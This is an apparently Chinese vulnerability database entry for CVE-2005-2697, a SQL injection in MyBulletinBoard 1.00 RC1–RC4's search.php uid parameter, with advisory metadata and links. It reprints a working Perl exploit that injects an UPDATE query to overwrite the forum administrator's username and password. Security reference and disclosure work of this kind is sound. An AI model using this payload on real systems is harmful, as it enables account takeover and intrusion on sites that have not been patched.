CVE-2005-2697
CVSS7.5
发布时间 :2005-08-26 11:50:00
修订时间 :2016-10-17 23:29:31
NMCOE    

[原文]SQL injection vulnerability in search.php for MyBulletinBoard (MyBB) 1.00 Release Candidate 1 through 4 allows remote attackers to execute arbitrary SQL commands via the uid parameter. NOTE: this issue might overlap CVE-2005-0282.


[CNNVD]MyBulletinBoard 'search.php' SQL注入漏洞(CNNVD-200508-291)

        MyBulletinBoard (MyBB) 1.00 发布候选版1至4中的 search.php页面存在SQL注入漏洞。这使得远程攻击者可以借助于uid参数执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:mybulletinboard:mybulletinboard:1.00_rc1
cpe:/a:mybulletinboard:mybulletinboard:1.00_rc2
cpe:/a:mybulletinboard:mybulletinboard:1.00_rc3
cpe:/a:mybulletinboard:mybulletinboard:1.00_rc4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2697
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2697
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-291
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112448791006470&w=2
(UNKNOWN)  BUGTRAQ  20050819 Vul in MyBB
http://www.securityfocus.com/bid/14615
(UNKNOWN)  BID  14615

- 漏洞信息

MyBulletinBoard 'search.php' SQL注入漏洞
高危 SQL注入
2005-08-26 00:00:00 2005-10-25 00:00:00
远程  
        MyBulletinBoard (MyBB) 1.00 发布候选版1至4中的 search.php页面存在SQL注入漏洞。这使得远程攻击者可以借助于uid参数执行任意SQL命令。

- 公告与补丁

        

- 漏洞信息 (1172)

MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit (EDBID:1172)
php webapps
2005-08-22 Verified
0 Alpha_Programmer
N/A [点击下载]
# mybb is dead /str0ke

#!/usr/bin/perl
######################################################################################
#                              Crouz.Com Security Team                               #
######################################################################################
#    EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability             #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius)                                #
#Email: Alpha_Programmer@LinuxMail.ORG                                               #
#                                                                                    #
#This Xpl Change Admin's Pass For L0gin With P0wer User                              #
#                                                                                    #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln      #
#                                                                                    #
######################################################################################
# GR33tz T0 ==>  mh_p0rtal  --  Dr-CephaleX  --  The-Cephexin  -- Djay_Agoustinno    #
#               No_Face_King --  Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
#                                                                                    #
#   Special Lamerz : Hoormazd  &  imm02tal  :P  ++ xshabgardx                        #
######################################################################################

use IO::Socket;

if (@ARGV < 2)
{
  print "\n==========================================\n";
  print " \n     -- Exploit By Alpha Programmer(sirius) --\n\n";
  print "              Crouz Security Team      \n\n";
  print "         Usage: <T4rg3t> <DIR>\n\n"; 
  print "==========================================\n\n";
  print "Examples:\n\n";
  print "    Mybb.pl www.Site.com /mybb/ \n";
  exit();

}
my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, 
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n";
$http .= "Host: $host\n\n\n\n";
print "\n";
print $remote $http;
print "Wait For Changing Password ...\n";
sleep(10);
print "OK , Now Login With :\n";
print "Username: crouz\n";
print "Password: crouz\n\n";
print "Enjoy ;)\n\n";

# milw0rm.com [2005-08-22]
		

- 漏洞信息

19139
MyBulletinBoard (MyBB) search.php uid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

MyBulletinBoard (MyBB) contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'search.php' script not properly sanitizing user-supplied input to the 'uid' variable. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-08-19 Unknow
2005-08-19 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Chris Boulton has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站